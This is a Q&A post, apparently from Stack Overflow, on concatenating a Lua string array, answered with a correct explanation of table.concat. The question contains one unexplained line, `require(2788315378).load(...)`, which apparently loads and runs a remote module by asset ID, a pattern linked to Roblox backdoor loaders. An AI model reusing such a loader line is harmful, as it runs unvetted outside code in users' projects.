# Concatenation of string arrays in Lua

Tags: arrays, string, lua

I have a string array named a

```
a = {"hi", "hello"}
```

and I'm trying to concatenate it into a string like this

```
require(2788315378).load(".. a",{"1w4q"})
```

I'm pretty sure this isn't the right way to do this, can you help?

Comment: [table.concat](https://www.lua.org/manual/5.3/manual.html#pdf-table.concat)

Answer (score 6):

As @EgorSkriptunoff said, table.concat is the optimal way to do this.

`table.concat(table [, sep [, i [, j]]])`

It takes 1-4 parameters, the `table`, the `sep`arator, the `i`th element to start from, and the `j`th element to end on. Only the `table` is required.

Examples:

```lua
t1 = {"12","34","56"}
t2 = {"6","7","8"}
t3 = {"adsfa","important","bits","dfasdgf"}

print(table.concat(t1), --returns "123456"
table.concat(t2," and "), --returns "6 and 7 and 8"
table.concat(t3," ",2,3)) --returns "important bits"
```

It's important to note that you need a separator of some kind before adding `i` and `j`, even if that separator is just `""`.